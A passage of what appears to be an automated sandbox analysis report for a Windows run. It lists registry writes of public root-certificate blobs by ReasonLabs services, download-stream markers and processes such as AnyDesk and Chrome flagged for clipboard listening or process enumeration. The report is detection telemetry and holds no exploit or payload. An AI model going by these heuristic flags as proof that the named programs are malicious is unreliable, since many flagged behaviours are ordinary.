0c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2 C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 5c0000000100000004000000001000001900000001000000100000009f687581f7ef744ecfc12b9cee6238f1030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa21d0000000100000010000000e78921f81cea4d4105d2b5f4afae0c78140000000100000014000000c87ed26a852a1bca1998040727cf50104f68a8a2090000000100000016000000301406082b0601050507030306082b060105050703086200000001000000200000005367f20c7ade0e2bca790915056d086b720c33c1fa2a2661acf787e3292e12700b00000001000000800000004d006900630072006f0073006f006600740020004900640065006e007400690074007900200056006500720069006600690063006100740069006f006e00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079002000320030003200300000000f000000010000003000000041ce925678dfe0ccaa8089263c242b897ca582089d14e5eb685fca967f36dbd334e97e81fd0e64815f851f914ade1a1e040000000100000010000000be954f16012122448ca8bc279602acf52000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2 C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431\Blob = 5c00000001000000040000000008000019000000010000001000000091fad483f14848a8a69b18b805cdbb3a030000000100000014000000503006091d97d4f5ae39f7cbe7927d7d652d34317e000000010000000800000000c001b39667d6011d0000000100000010000000e871723e266f38af5d49cda2a502669c14000000010000001400000055e481d11180bed889b908a331f9a1240916b9700b000000010000001e00000045006e0074007200750073007400200028003200300034003800290000006200000001000000200000006dc47172e01cbcb0bf62580d895fe2b8ac9ad4f873801e0c10b9c837d21eb1777f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b06010505070307530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f0000000100000014000000327fc447408de9bf596f83d4b2fa4b8e3e7097d8040000000100000010000000ee2931bc327e9ae6e8b5f751b434719020000000010000002e0400003082042a30820312a00302010202043863def8300d06092a864886f70d01010505003081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f7269747920283230343829301e170d3939313232343137353035315a170d3239303732343134313531325a3081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f726974792028323034382930820122300d06092a864886f70d01010105000382010f003082010a0282010100ad4d4ba91286b2eaa320071516642a2b4bd1bf0b4a4d8eed8076a567b77840c07342c868c0db532bdd5eb8769835938b1a9d7c133a0e1f5bb71ecfe524141eb181a98d7db8cc6b4b03f1020cdcaba54024007f7494a19d0829b3880bf587779d55cde4c37ed76a64ab851486955b9732506f3dc8ba660ce3fcbdb849c176894919fdc0a8bd89a3672fc69fbc711960b82de92cc99076667b94e2af78d665535d3cd69cb2cf2903f92fa450b2d448ce0532558afdb2644c0ee4980775db7fdfb9085560853029f97b48a46986e3353f1e865d7a7a15bdef008e1522541700902693bc0e496891bff847d39d9542c10e4ddf6f26cfc3182162664370d6d5c007e10203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041455e481d11180bed889b908a331f9a1240916b970300d06092a864886f70d010105050003820101003b9b8f569b30e753997c7a79a74d97d7199590fb061fca337c46638f966624fa401b2127cae67273f24ffe3199fdc80c4c6853c680821398fab6adda5d3df1ce6ef6151194820cee3f95af11ab0fd72fde1f038f572c1ec9bb9a1a4495eb184fa61fcd7d57102f9b04095a84b56ed81d3ae1d69ed16c795e791c14c5e3d04c933b653ceddf3dbea6e5951ac3b519c3bd5e5bbbff23ef6819cb1293275c032d6f30d01eb61aacde5af7d1aaa827a6fe7981c479993357ba12b0a9e0426c93ca56defe6d840b088b7e8dead79821c6f3e73c792f5e9cd14c158de1ec2237cc9a430b97dc80908db3679b6f48081556cfbff12b7c5e9a76e95990c57c8335116551 C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431\Blob = 040000000100000010000000ee2931bc327e9ae6e8b5f751b43471900f0000000100000014000000327fc447408de9bf596f83d4b2fa4b8e3e7097d8090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c07f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b060105050703076200000001000000200000006dc47172e01cbcb0bf62580d895fe2b8ac9ad4f873801e0c10b9c837d21eb1770b000000010000001e00000045006e00740072007500730074002000280032003000340038002900000014000000010000001400000055e481d11180bed889b908a331f9a1240916b9701d0000000100000010000000e871723e266f38af5d49cda2a502669c7e000000010000000800000000c001b39667d601030000000100000014000000503006091d97d4f5ae39f7cbe7927d7d652d343119000000010000001000000091fad483f14848a8a69b18b805cdbb3a20000000010000002e0400003082042a30820312a00302010202043863def8300d06092a864886f70d01010505003081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f7269747920283230343829301e170d3939313232343137353035315a170d3239303732343134313531325a3081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f726974792028323034382930820122300d06092a864886f70d01010105000382010f003082010a0282010100ad4d4ba91286b2eaa320071516642a2b4bd1bf0b4a4d8eed8076a567b77840c07342c868c0db532bdd5eb8769835938b1a9d7c133a0e1f5bb71ecfe524141eb181a98d7db8cc6b4b03f1020cdcaba54024007f7494a19d0829b3880bf587779d55cde4c37ed76a64ab851486955b9732506f3dc8ba660ce3fcbdb849c176894919fdc0a8bd89a3672fc69fbc711960b82de92cc99076667b94e2af78d665535d3cd69cb2cf2903f92fa450b2d448ce0532558afdb2644c0ee4980775db7fdfb9085560853029f97b48a46986e3353f1e865d7a7a15bdef008e1522541700902693bc0e496891bff847d39d9542c10e4ddf6f26cfc3182162664370d6d5c007e10203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041455e481d11180bed889b908a331f9a1240916b970300d06092a864886f70d010105050003820101003b9b8f569b30e753997c7a79a74d97d7199590fb061fca337c46638f966624fa401b2127cae67273f24ffe3199fdc80c4c6853c680821398fab6adda5d3df1ce6ef6151194820cee3f95af11ab0fd72fde1f038f572c1ec9bb9a1a4495eb184fa61fcd7d57102f9b04095a84b56ed81d3ae1d69ed16c795e791c14c5e3d04c933b653ceddf3dbea6e5951ac3b519c3bd5e5bbbff23ef6819cb1293275c032d6f30d01eb61aacde5af7d1aaa827a6fe7981c479993357ba12b0a9e0426c93ca56defe6d840b088b7e8dead79821c6f3e73c792f5e9cd14c158de1ec2237cc9a430b97dc80908db3679b6f48081556cfbff12b7c5e9a76e95990c57c8335116551 C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4\Blob = 0400000001000000100000004be2c99196650cf40e5a9392a00afeb20f0000000100000020000000fde5f2d9ce2026e1e10064c0a468c9f355b90acf85baf5ce6f52d4016837fd94090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c07f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b0601050507030762000000010000002000000043df5774b03e7fef5fe40d931a7bedf1bb2e6b42738c4e6d3841103d3aa7f3390b000000010000001800000045006e00740072007500730074002e006e006500740000001400000001000000140000006a72267ad01eef7de73b6951d46c8d9f901266ab1d0000000100000010000000521b5f4582c1dcaae381b05e37ca2d347e000000010000000800000000c001b39667d6010300000001000000140000008cf427fd790c3ad166068de81e57efbb932272d4190000000100000010000000fa46ce7cbb85cfb4310075313a09ee052000000001000000420400003082043e30820326a00302010202044a538c28300d06092a864886f70d01010b05003081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d204732301e170d3039303730373137323535345a170d3330313230373137353535345a3081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100ba84b672db9e0c6be299e93001a776ea32b895411ac9da614e5872cffef68279bf7361060aa527d8b35fd3454e1c72d64e32f2728a0ff78319d06a808000451eb0c7e79abf1257271ca3682f0a87bd6a6b0e5e65f31c77d5d4858d7021b4b332e78ba2d5863902b1b8d247cee4c949c43ba7defb547d57bef0e86ec279b23a0b55e250981632135c2f7856c1c294b3f25ae4279a9f24d7c6ecd09b2582e3ccc2c445c58c977a066b2a119fa90a6e483b6fdbd4111942f78f07bff5535f9c3ef4172ce669ac4e324c6277eab7e8e5bb34bc198bae9c51e7b77eb553b13322e56dcf703c1afae29b67b683f48da5af624c4de058ac64341203f8b68d946324a4710203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604146a72267ad01eef7de73b6951d46c8d9f901266ab300d06092a864886f70d01010b05000382010100799f1d96c6b6793f228d87d3870304606a6b9a2e59897311ac43d1f513ff8d392bc0f2bd4f708ca92fea17c40b549ed41b9698333ca8ad62a20076ab59696e061d7ec4b9448d98af12d461db0a194647f3ebf763c1400540a5d2b7f4b59a36bfa98876880455042b9c877f1a373c7e2da51ad8d4895ecabdac3d6cd86dafd5f3760fcd3b8838229d6c939ac43dbf821b653fa60f5daafce5b215cab5adc6bc3dd084e8ea0672b04d393278bf3e119c0ba49d9a21f3f09b0b3078dbc1dc8743febc639acac5c21cc9c78dff3b125808e6b63dec7a2c4efb8396ce0c3c69875473a473c293ff5110ac155401d8fc05b189a17f74839a49d7dc4e7b8a486f8b45f6 C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\saBSI.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2 C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431 C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 346579.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 939052.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Program Files\Wireshark\Wireshark.exe N/A
N/A N/A F:\BlueStacks X\BlueStacks X.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Users\Admin\Downloads\AnyDesk.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
